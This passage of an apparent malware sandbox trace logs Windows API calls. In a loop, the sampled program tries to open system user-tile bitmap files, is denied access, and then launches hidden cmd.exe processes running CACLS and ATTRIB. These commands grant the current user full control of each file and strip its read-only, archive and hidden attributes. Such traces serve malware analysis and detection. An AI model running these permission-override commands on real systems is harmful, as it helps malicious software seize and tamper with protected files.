(hObject=0x1b4) returned 1 [0182.919] CloseHandle (hObject=0x120) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.919] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", lpFilePart=0x12eab4*="usertile17.bmp") returned 0x52 [0182.919] GetLastError () returned 0x5 [0182.920] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.920] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.920] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0182.920] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.920] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.920] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.920] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.920] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.920] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0182.920] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", lpFilePart=0x12eab4*="usertile18.bmp") returned 0x52 [0182.921] GetLastError () returned 0x5 [0182.921] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.921] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.921] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.921] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.921] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.921] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.921] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0182.921] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0182.921] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd9c, dwThreadId=0x394)) returned 1 [0182.922] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0183.097] CloseHandle (hObject=0x1b4) returned 1 [0183.097] CloseHandle (hObject=0x120) returned 1 [0183.097] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.097] ReleaseMutex (hMutex=0xf8) returned 1 [0183.097] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.098] ReleaseMutex (hMutex=0xf8) returned 1 [0183.098] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.098] ReleaseMutex (hMutex=0xf8) returned 1 [0183.098] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.098] ReleaseMutex (hMutex=0xf8) returned 1 [0183.098] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.098] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile18.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", lpFilePart=0x12eab4*="usertile18.bmp") returned 0x52 [0183.098] GetLastError () returned 0x5 [0183.098] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.098] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.098] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.098] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.098] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.098] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.098] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.098] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.098] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 
[0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 [0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 [0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 [0183.099] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.100] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", lpFilePart=0x12eab4*="usertile19.bmp") returned 0x52 [0183.100] GetLastError () returned 0x5 [0183.100] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.100] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.100] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0183.100] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.100] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.100] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.100] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0183.100] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0183.100] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe58, dwThreadId=0xee0)) returned 1 [0183.105] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] CloseHandle 
(hObject=0x1b4) returned 1 [0183.649] CloseHandle (hObject=0x120) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.649] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", lpFilePart=0x12eab4*="usertile19.bmp") returned 0x52 [0183.649] GetLastError () returned 0x5 [0183.649] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0183.650] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.650] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0183.650] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.650] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.650] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.650] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.650] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.650] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xffffffff [0183.650] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", lpFilePart=0x12eab4*="usertile20.bmp") returned 0x52 [0183.650] GetLastError () returned 0x5 [0183.650] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0183.650] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.650] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.650] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.651] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.651] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.651] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0183.651] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0183.651] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe50, dwThreadId=0xddc)) returned 1 [0183.653] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0183.830] CloseHandle (hObject=0x1b4) returned 1 [0183.830] CloseHandle (hObject=0x120) returned 1 [0183.830] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.830] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.831] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile20.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", lpFilePart=0x12eab4*="usertile20.bmp") returned 0x52 [0183.831] GetLastError () returned 0x5 [0183.831] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.831] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.831] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.831] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.831] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.831] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.831] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.831] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.831] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 
[0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.832] ReleaseMutex (hMutex=0xf8) returned 1 [0183.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.832] ReleaseMutex (hMutex=0xf8) returned 1 [0183.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.832] ReleaseMutex (hMutex=0xf8) returned 1 [0183.832] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.832] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", lpFilePart=0x12eab4*="usertile21.bmp") returned 0x52 [0183.832] GetLastError () returned 0x5 [0183.832] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.832] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.832] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
